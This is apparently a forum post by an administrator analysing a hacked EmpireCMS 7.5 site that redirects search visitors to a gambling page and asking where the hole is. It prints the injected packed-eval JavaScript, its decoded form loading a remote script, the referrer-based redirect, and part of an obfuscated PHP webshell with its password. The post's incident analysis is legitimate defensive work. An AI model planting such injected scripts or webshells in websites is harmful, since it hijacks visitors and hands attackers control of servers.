帝国cms被上传木马/e/ecachefiles/empirecms/loopes.php
有一个客户的帝国cms7.5 utf8系统的网站被挂木马了。
1、 具体现象是,打开网站首页,跳转到一个博彩网站。
之后查看首页源代码,发现顶部标题、关键词、描述部分被更改,并且添加了可疑的js代码。代码如下:
<title>北京PK10在线人工计划-北京PK10计划网-全天北京赛车pk10计划网</title>
<meta name="keywords" content="北京PK10计划,北京赛车pk10计划,北京PK10人工计划,北京赛车pk10人工计划,北京赛车pk10在线计划,"/>
<meta name="description" content="欢迎来到北京赛车计划网【官方网址:YY234.COM】这里为您提供北京PK10在线人工计划,免费北京赛车计划网页版,开奖结果,开奖直播,走势图分析,玩法技巧为一体的专业北京PK10计划服务网站!"/>
<script>
if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="燕楚精英教育一站式学习平台,燕楚精英教育官网!秦皇岛精英教育培训学校!"}</script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c]);return p;}('m["nb1ej7o�"]["l38�7"]('i21384� �k47d6�7s�5fctc21384�6 231d69��42p552a9ea9rg1bj5kq1gf26hi521384�h');',30,30,'x74|x63|x73|x72|x70|x2f|x22|x65|x69|x68|x66|x6f|x61|x3d|x75|x6a|x2e|x3e|x3c|x6d|x79|x77|window|x64|x6e|x3a|x6c|x32|x78|x76'.split('|'),0,{}))
</script>
2、 上面js代码是加密的,解密后的js代码如下:
< script type = "text/javascript" >
window["document"]["write"]('<script type="text/javascript" src="https://sfhufh2.com/ylc.js"></script>');
< /script>
这是调用了别的网站的一个js文件,打开这个js文件,代码如下:
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?70546d661cadce41b9173a040b7f077e";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
(function () {
/*百度推送代码*/
var bp = document.createElement('script');
bp.src = '//push.zhanzhang.baidu.com/push.js';
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
/*360推送代码*/
var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';
document.write('<script src="' + src + '" id="sozz"></script>');
})();
document.writeln("<script LANGUAGE="Javascript">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0 ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 )");
document.writeln("location.href="https://13250vip.com";");
document.writeln("</script>");
查看上面代码,发现这就是跳转代码。
3、 之后查询帝国cms系统中的可疑文件。最终发现可疑文件:/ecachefiles/empirecms/loopes.php ,这是动态缓存目录,这目录中默认没有php文件。
打开这文件,代码如下(下面的$str变量中的内容太多,只选取了一部分展示):
<?php
$password='c2.o';
$shellname='BY:FBI';
$myurl='http://www.baidu.com';
error_reporting(E_ERROR | E_PARSE);@set_time_limit(0);
ob_start();
header("content-Type: text/html; charset=gb2312");
$str = "6s625s737461727428293o0q0n646566696r6528276q7961646472657373272p245s5345525645525o275343524950545s46494p454r414q45275q293o0q0n646566696r652827656r766p70617373272p2470617373776s7264293o0q0n646566696r6528277368656p6p6r616q65272p24736865504s53545o2766696p6573275q2p245s504s53545o27616374616p6p275q2p245s504s53545o275s636s6r766572742866696p657065726q73282464697270617468292p31302p38292p2q34293o0q0n0909092466696p6574696q65203q2040646174652827592q6q2q6420483n693n73272p4066696p656q74696q6528246469727061746829293o0q0n0909092464697270617468203q2075726p656r636s6465282464697270617468293o0q0n09090968746q6p5s6r28273p7472206865696768743q223235223r3p74643r3p696r70757420747970653q22636865636o626s7822206r616q653q2266696p65735o5q222076616p75653q22272r24646972732r27223r27293o0q0n09090968746q6p5s696q67282264697222293o0q0n09090968746q6p5s6128273s65616r7665723q6q61696r26706174683q272r24646972706174682p2464697273293o0q0n09090968746q6p5s6r28273p2s74643r3p746420616p69676r3q2263656r746572223r27293o0q0n09090968746q6p5s6r28223p6120687265663q5p22235p22206s6r436p69636o3q5p2272757375726563686o28272464697273275s666p75736828293o";
$dir = pack("H*",str_rot13($str));
eval($dir);
?>
这个文件是动态目录里的文件,产生的效果是,网站首页模板是没有问题的,并且更改网站首页模板,并生成首页html,但首页html不变,也就是这个动态缓存起了效果。
删除这个木马文件后。首页更新恢复正常。
现在的问题是,问一下大家有没有遇到类似的问题,这是帝国什么地方有漏洞导致被上传木马?请大家指教。